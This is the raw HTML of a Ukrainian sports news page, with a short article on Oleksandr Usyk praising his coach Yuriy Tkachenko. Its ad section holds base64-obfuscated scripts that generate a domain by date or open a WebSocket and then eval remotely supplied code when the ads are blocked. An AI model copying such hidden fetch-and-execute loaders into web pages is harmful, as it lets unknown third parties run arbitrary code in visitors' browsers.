Tennis Europe 2 января (ОБНОВЛЯЕТСЯ)" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/5264a79c0e3a69952e4c3ead5718d769-100x65.png" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" srcset="https://euro.com.ua/wp-content/uploads/2020/01/5264a79c0e3a69952e4c3ead5718d769-100x65.png 100w, https://euro.com.ua/wp-content/uploads/2020/01/5264a79c0e3a69952e4c3ead5718d769-364x233.png 364w" sizes="(max-width: 100px) 100vw, 100px" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/tennis/2020/01/02/ykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia/" rel="bookmark" title="Украинцы на турнирах Tennis Europe 2 января (ОБНОВЛЯЕТСЯ)">Украинцы на турнирах Tennis Europe 2 января (ОБНОВЛЯЕТСЯ)</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T08:49:59+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" title="Усик: Нашел нормального тренера, когда стал чемпионом мира" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200-100x65.png" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" rel="bookmark" title="Усик: Нашел нормального тренера, когда стал чемпионом мира">Усик: Нашел нормального тренера, когда стал чемпионом мира</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T08:33:03+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2020/01/02/agent-ob-interese-k-talanta-shahtera/" title="Агент &#8211; об интересе к таланта &#8220;Шахтера&#8221;" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/613f63de3fdf0f7c74632f9e598b6d26.jpeg-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2020/01/02/agent-ob-interese-k-talanta-shahtera/" rel="bookmark" title="Агент &#8211; об интересе к таланта &#8220;Шахтера&#8221;">Агент &#8211; об интересе к таланта &#8220;Шахтера&#8221;</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T07:59:01+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/autosport/2020/01/02/31-dekabria-den-rojdeniia-germana-tilke/" title="31 декабря – день рождения Германа Тильке" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/36d25318f67f7e84f0aa09ec602849e6-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/autosport/2020/01/02/31-dekabria-den-rojdeniia-germana-tilke/" rel="bookmark" title="31 декабря – день рождения Германа Тильке">31 декабря – день рождения Германа Тильке</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T07:25:19+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-loadmore clearfix"><a href="#" class="ajax-loadmore-link ajax-link"><span>еще</span></a><div class="ajax-animation"><span class="ajax-animation-icon"></span></div></div></div></div></div><!-- #block wrap--></div></section>			</div>
			</div>
</div><!--off-canvas --><div id="ruby-site" class="site-outer">
	<div class="header-wrap header-style-3">
	<div class="header-inner">
		


		<div class="topbar-wrap topbar-style-1">
	<div class="ruby-container">
		<div class="topbar-inner container-inner clearfix">
			<div class="topbar-left">
				
<div class="topbar-date">
	<span >Четверг, 2 января, 2020</span>
</div>				<div class="topbar-info">
						<span class="info-phone"><i class="fa fa-mobile" aria-hidden="true"></i><span>+380730902942</span></span>
									<span class="info-email"><i class="fa fa-envelope" aria-hidden="true"></i><span>info@euro.com.ua</span></span>
			</div>							</div>
			<div class="topbar-right">
												
	<div class="topbar-social tooltips">
		<a class="icon-facebook" title="facebook" href="https://www.facebook.com/eurocomu/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter" title="twitter" href="https://twitter.com/euro_com_ua" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a><a class="icon-vk" title="vkontakte" href="https://vk.com/eurocomua" target="_blank"><i class="fa fa-vk" aria-hidden="true"></i></a>	</div>
							</div>
		</div>
	</div>
</div>

		<div class="navbar-outer clearfix">
			<div class="navbar-wrap">
				<div class="ruby-container">
					<div class="navbar-inner container-inner clearfix">
						<div class="navbar-mobile">
							<div class="off-canvas-btn-wrap">
	<div class="off-canvas-btn">
		<a href="#" class="ruby-toggle" title="off-canvas button">
			<span class="icon-toggle"></span>
		</a>
	</div>
</div>
							
	<div class="logo-mobile-wrap is-logo-image">
		<a href="https://euro.com.ua/" class="logo-mobile" title="Новости спорта">
			<img height="57" width="280" src="https://euro.com.ua/wp-content/uploads/2018/11/logoeurocomua-1.png" alt="главные спортивные новости Украины и мира">
		</a>
	</div>


						</div><!--mobile -->
						<div class="navbar-left">
							<div class="logo-wrap is-logo-image"  itemscope  itemtype="https://schema.org/Organization" >
	<div class="logo-inner">
						<a href="https://euro.com.ua/" class="logo" title="Новости спорта">
				<img height="57" width="280" src="https://euro.com.ua/wp-content/uploads/2018/11/logoeurocomua-1.png" alt="главные спортивные новости Украины и мира">
			</a>
				</div>

	
</div>
						</div>
						<div class="navbar-right">
														<nav id="ruby-main-menu" class="main-menu-wrap"  itemscope  itemtype="https://schema.org/SiteNavigationElement" >
	<div class="menu-main-container"><ul id="main-menu" class="main-menu-inner"><li id="menu-item-1297" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1297 is-category-1"><a href="https://euro.com.ua/football/">Футбол</a></li><li id="menu-item-1298" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1298 is-category-6"><a href="https://euro.com.ua/hockey/">Хоккей</a></li><li id="menu-item-1293" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1293 is-category-8"><a href="https://euro.com.ua/basketball/">Баскетбол</a></li><li id="menu-item-1296" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1296 is-category-4"><a href="https://euro.com.ua/tennis/">Теннис</a></li><li id="menu-item-1292" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1292 is-category-3"><a href="https://euro.com.ua/autosport/">Автоспорт</a></li><li id="menu-item-1295" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-1295 is-category-5"><a href="https://euro.com.ua/box/">Бокс</a></li><li id="menu-item-1715" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1715"><a href="#">Другие</a><ul class="sub-menu is-sub-default">	<li id="menu-item-106148" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106148 is-category-23328"><a href="https://euro.com.ua/snuker/">Снукер</a></li>	<li id="menu-item-106149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106149 is-category-23329"><a href="https://euro.com.ua/biatlon/">Биатлон</a></li>	<li id="menu-item-106150" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106150 is-category-23331"><a href="https://euro.com.ua/zimnie-vidy/">Зимние виды</a></li>	<li id="menu-item-99426" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99426 is-category-22914"><a href="https://euro.com.ua/raznoe/">Разное</a></li></ul></li></ul></div></nav>							<div class="navbar-elements">
																<div class="navbar-search">
	<a href="#" id="ruby-navbar-search-icon" data-mfp-src="#ruby-header-search-popup" data-effect="mpf-ruby-effect header-search-popup-outer" title="search" class="navbar-search-icon">
		<i class="icon-simple icon-magnifier"></i>
	</a><!--navbar search button-->
</div>
															</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>

	<div id="ruby-header-search-popup" class="header-search-popup mfp-hide mfp-animation">
	<div class="header-search-popup-inner is-light-text">
		<form class="search-form" method="get" action="https://euro.com.ua/">
			<fieldset>
				<input id="ruby-search-input" type="text" class="field" name="s" value="" placeholder="Введите слово для поиска…" autocomplete="off">
				<button type="submit" value="" class="btn"><i class="icon-simple icon-magnifier" aria-hidden="true"></i></button>
			</fieldset>
			<div class="header-search-result"></div>
		</form>
	</div>
</div>	


</div>	<div class="site-wrap">
		<div class="site-mask"></div>
		<div class="site-inner"><div id="single-post-infinite" data-next_post_id="156468" class="clearfix"><div class="single-post-outer clearfix" data-post_url="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" data-post_title="Усик: Нашел нормального тренера, когда стал чемпионом мира"><article class="single-post-wrap single-post-1 is-single-left ruby-ajax-view-add post-156470 post type-post status-publish format-standard has-post-thumbnail hentry category-box"  itemscope  itemtype="https://schema.org/Article"  data-post_id ="156470"><div class="ruby-page-wrap ruby-section row is-sidebar-right ruby-container single-wrap"><div class="breadcrumb-outer"><div class="breadcrumb-wrap"><div class="breadcrumb-inner ruby-container"><span><a href="https://euro.com.ua/" rel="bookmark" title="Главная"><span>Главная</span></a></span><i class="fa fa-angle-right breadcrumb-next"></i><span typeof="v:Breadcrumb"><a rel="bookmark" href="https://euro.com.ua/box/"><span>Бокс</span></a></span><i class="fa fa-angle-right breadcrumb-next"></i><span typeof="v:Breadcrumb" class="breadcrumb-current">Усик: Нашел нормального тренера, когда стал чемпионом мира</span></div></div></div><div class="ruby-content-wrap single-inner col-sm-8 col-xs-12 content-with-sidebar" ><div class="single-post-header"><div class="post-cat-info single-post-cat-info"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><h1 class="single-title post-title entry-title is-size-1">Усик: Нашел нормального тренера, когда стал чемпионом мира</h1><div class="single-post-meta-info clearfix"><div class="single-post-meta-info-inner"><div class="post-meta-info is-show-icon"><span class="meta-info-el meta-info-author"><i class="icon-simple icon-note"></i><span class="vcard author"><a class="url fn n" href="https://euro.com.ua/author/Admin/">Admin</a></span></span><span  class="meta-info-el meta-info-comment"><i class="icon-simple icon-bubble"></i><a href="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/#respond" title="Усик: Нашел нормального тренера, когда стал чемпионом мира">Нет комментариев</a></span></div><div class="meta-info-date-full"><span class="meta-info-date-full-inner"><span>Добавлено</span> <time class="date published" datetime="2020-01-02T08:33:03+00:00">Янв. 02, 2020 в 08:33</time></span></div></div></div><div class="single-post-thumb-outer"><div class="post-thumb"><img width="630" height="378" src="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200.png" class="attachment-newsmax_ruby_crop_750x460 size-newsmax_ruby_crop_750x460 wp-post-image" alt="" srcset="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200.png 630w, https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200-300x180.png 300w" sizes="(max-width: 630px) 100vw, 630px" /></div></div><div class="single-post-action clearfix"><div class="single-post-counter"><div class="single-post-share-total"><span class="share-total-icon"><i class="icon-simple icon-share"></i></span><span class="share-total-number">0</span><span class="share-total-caption post-title is-size-4"><span>Share</span></span></div><div class="single-post-view-total"><span class="view-total-icon"><i class="icon-simple icon-fire"></i></span><span class="view-total-number ruby-ajax-view is-invisible" data-post_id="156470">3</span><span class="view-total-caption post-title is-size-4"><span> </span></span></div></div><div class="single-post-meta-info-share"><span class="share-bar-el share-bar-label"><i class="icon-simple icon-share"></i></span><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%A3%D1%81%D0%B8%D0%BA%3A+%D0%9D%D0%B0%D1%88%D0%B5%D0%BB+%D0%BD%D0%BE%D1%80%D0%BC%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B3%D0%BE+%D1%82%D1%80%D0%B5%D0%BD%D0%B5%D1%80%D0%B0%2C+%D0%BA%D0%BE%D0%B3%D0%B4%D0%B0+%D1%81%D1%82%D0%B0%D0%BB+%D1%87%D0%B5%D0%BC%D0%BF%D0%B8%D0%BE%D0%BD%D0%BE%D0%BC+%D0%BC%D0%B8%D1%80%D0%B0&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i><span style="display: none"><script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></span></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div></div><div class="single-post-body"><div class="entry single-entry"><p><strong>К последним поединкам готовился под руководством Ткаченко</strong></p>
<p> </p>
<p> #Ткаченко #Усик </p>
<p class="article__source">
 Источник &#8211; sport.ua.
 </p>
<p style="text-align: justify;">Обязательный претендент на пояс WBO в супертяжелом весе Александр Усик (17-0, 13 КО) доволен сотрудничеством с нынешним тренером &#8211; Юрием Ткаченко.</p>
<p style="text-align: justify;">Об этом он заявил в интервью собственному You-Tube канала USYK17.</p>
<blockquote>
<p style="text-align: justify;">&#8220;Почему у меня так часто меняется команда? Это просто объяснить. Собрать профессиональную команду, которая будет с тобой на протяжении долгого времени &#8211; это очень сложно. Я нашел тренера, нормального боксерского тренера только после того, как стал абсолютным чемпионом мира. Я не беру таких людей, как Анатолий Николаевич Ломаченко, Сергей Юрьевич Лапин, которые всю карьеру со мной.</p>
<p style="text-align: justify;">А вот с Юрием Ивановичем Ткаченко мы начали работать, когда я к Белью готовился. Хотя мы и в любителях с ним работали. Представляете, сколько времени нужно было, чтобы его найти? А он был здесь, рядом, мы виделись, общались, созванивались. Всему свое время&#8221;, &#8211; сказал Усик.</p>
</blockquote>
<p style="text-align: justify;">Ранее, Гірн назвал условия боя Джошуа – Усик.</p>
<div style="clear:both; margin-top:0em; margin-bottom:1em;"><a href="https://euro.com.ua/box/2019/06/25/izvestnyi-promoyter-schitaet-ysika-samym-masterovitym-sypertiajem-mira/" target="_self" class="u63cca4991d0f6a576a4284697fb2b480"><!-- INLINE RELATED POSTS 1/3 //--><style> .u63cca4991d0f6a576a4284697fb2b480 { padding:0px; margin: 0; padding-top:1em!important; padding-bottom:1em!important; width:100%; display: block; font-weight:bold; background-color:inherit; border:0!important; border-left:4px solid inherit!important; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -o-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); text-decoration:none; } .u63cca4991d0f6a576a4284697fb2b480:active, .u63cca4991d0f6a576a4284697fb2b480:hover { opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; text-decoration:none; } .u63cca4991d0f6a576a4284697fb2b480 { transition: background-color 250ms; webkit-transition: background-color 250ms; opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; } .u63cca4991d0f6a576a4284697fb2b480 .ctaText { font-weight:bold; color:#141414; text-decoration:none; font-size: 16px; } .u63cca4991d0f6a576a4284697fb2b480 .postTitle { color:inherit; text-decoration: underline!important; font-size: 16px; } .u63cca4991d0f6a576a4284697fb2b480:hover .postTitle { text-decoration: underline!important; } </style><div style="padding-left:1em; padding-right:1em;"><span class="ctaText">Читайте также:</span>&nbsp; <span class="postTitle">Известный промоутер считает Усика самым мастеровитым супертяжем мира</span></div></a></div><p style="text-align: justify;">Напомним, Джошуа вернул себе чемпионские титулы, одержав победу над Энди Руисом единогласным решением судей.</p>
<div class="single-post-tag-outer post-title is-size-4">
<div class="single-post-source single-post-tag"><span class="tag-label">Источник: </span><a href="champion.com.ua" title="Источник" target="_blank" rel="nofollow noopener noreferrer">champion.com.ua</a></div>
</div>
<div class="single-post-ad is-ad-script single-post-ad-bottom"><div><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script>
<div id="720_209"></div>
<script type="text/javascript">
	new MTr('720_209', {site:905,format:0});
</script>

                     
          <div id="MIXADV_5497" class="MIXADVERT_NET"></div>
          <script> 
          var node5497 = document.getElementById("MIXADV_5497");
          if( node5497 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=5497&r="+Math.random();
               node5497.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDU0OTcgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNTQ5Ny5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTU0OTcuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjU0OTciKSkgfSwgNTAwMCk7ICA7fTsg") );
              }
          }
          </script>
                  
<script class="r36562" type="text/javascript">
    (function() {
        var worker36562,
            tickerID = 36562,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36562'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36562');
            script.setAttribute('data-idn', idn);
            script.src = '//virt0n.news/ru-n4p/0/36/ticker_36562.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36562.postMessage(data);
                }

                worker36562 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36562.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36562.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>

<!-- start NEW_content_v1 for euro.com.ua -->
<div id="adpartner-jsunit-3737">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=3737&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_content_v1 for euro.com.ua -->

<div id="bn_646f2e6073">загрузка...</div><script async type="text/javascript" src="//recreativ.ru/rcode.646f2e6073.js"></script></div></div><div class="single-post-tag-outer post-title is-size-4"></div></div><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/"/><meta itemprop="headline " content="Усик: Нашел нормального тренера, когда стал чемпионом мира"><span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Admin"></span><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200.png"><meta itemprop="width" content="630"><meta itemprop="height" content="378"></span><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://euro.com.ua/wp-content/uploads/2018/11/logoeurocomua-1.png"></span><meta itemprop="name" content="Admin"></span><meta itemprop="datePublished" content="2020-01-02T08:33:03+00:00"/><meta itemprop="dateModified" content="2020-01-02T08:33:03+00:00"/></div><div class="single-post-box-outer"><div class="single-post-box single-post-box-comment is-show-btn"><div class="box-comment-btn-wrap"><a href="#" class="box-comment-btn">Написать комментарий</a></div><div class="box-comment-content"><div id="comments" class="comments-area">
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Добавить комментарий <small><a rel="nofollow" id="cancel-comment-reply-link" href="/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/#respond" style="display:none;">Отменить ответ</a></small></h3><form action="https://euro.com.ua/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-form comment-form-comment"><label for="comment" >Напишите здесь свой комментарий</label><textarea id="comment" name="comment" cols="45" rows="8" aria-required="true" placeholder="Напишите здесь свой комментарий..."></textarea></p><p class="comment-form comment-form-author"><label for="author" >Имя </label><input id="author" name="author" type="text" placeholder="Имя ..." size="30"  aria-required='true' /></p>
<p class="comment-form comment-form-email"><label for="email" >Email</label><input id="email" name="email" type="text" placeholder="Email..."  aria-required='true' /></p>
<p class="aiowps-captcha"><label for="aiowps-captcha-answer">Пожалуйста, введите ответ цифрами:</label><div class="aiowps-captcha-equation"><strong>тринадцать &#43; двадцать = <input type="hidden" name="aiowps-captcha-string-info" id="aiowps-captcha-string-info" value="eb6b2zzy6u" /><input type="hidden" name="aiowps-captcha-temp-string" id="aiowps-captcha-temp-string" value="1577948694" /><input type="text" size="2" id="aiowps-captcha-answer" name="aiowps-captcha-answer" value="" autocomplete="off" /></strong></div></p><p class="form-submit"><input name="submit" type="submit" id="comment-submit" class="clearfix" value="Отправить комментарий" /> <input type='hidden' name='comment_post_ID' value='156470' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	
</div></div></div><div class="single-post-box-related clearfix box-related-1"><div class="box-related-header block-header-wrap"><div class="block-header-inner"><div class="block-title"><h3>Вам может понравиться </h3></div></div></div><div class="box-related-content row"><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" title="Арум: Джошуа завершит карьеру в 2020 году" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/052662256283808ff3bcc70bc1c51f1a-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Farym-djoshya-zavershit-karery-v-2020-gody%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" 